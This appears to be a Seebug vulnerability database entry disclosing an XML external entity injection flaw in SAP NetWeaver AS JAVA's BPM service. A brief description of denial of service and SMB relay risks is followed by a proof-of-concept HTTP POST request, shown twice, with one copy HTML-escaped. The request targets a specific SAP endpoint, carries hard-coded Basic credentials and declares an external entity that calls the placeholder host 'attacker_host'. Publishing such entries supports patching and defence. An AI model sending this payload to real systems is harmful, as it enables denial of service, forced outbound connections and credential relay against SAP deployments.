SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML external entity injection vulnerability

2016-11-23T00:00:00
ID SSV:92552
Type seebug
Reporter Root
Modified 2016-11-23T00:00:00

Description

1) It is possible, that an attacker can perform a DoS attack (for example, an XML Entity expansion attack)

2) An SMB Relay attack is a type of man-in-the-middle attack where an attacker asks a victim to authenticate to a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways, giving him access.

PoC ```

POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1

Content-Type: text/xml

User-Agent: ERPscan

Host: SAP_IP:SAP_PORT

Content-Length: 480

Connection: Keep-Alive

Cache-Control: no-cache

Authorization: Basic ZXJwc2NhbjplcnBzY2Fu

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">

<SOAP-ENV:Body>

   &lt;m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/&gt;

&xxe;</SOAP-ENV:Body>

</SOAP-ENV:Envelope> ```

                                        
                                            
                                                POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1
 
Content-Type: text/xml
 
User-Agent: ERPscan
 
Host: SAP_IP:SAP_PORT
 
Content-Length: 480
 
Connection: Keep-Alive
 
Cache-Control: no-cache
 
Authorization: Basic ZXJwc2NhbjplcnBzY2Fu
 
 
&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "http://attacker_host"&gt;
]&gt;&lt;SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"&gt;
 
   &lt;SOAP-ENV:Body&gt;
 
       &lt;m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/&gt;
 
   &xxe;&lt;/SOAP-ENV:Body&gt;
 
&lt;/SOAP-ENV:Envelope&gt;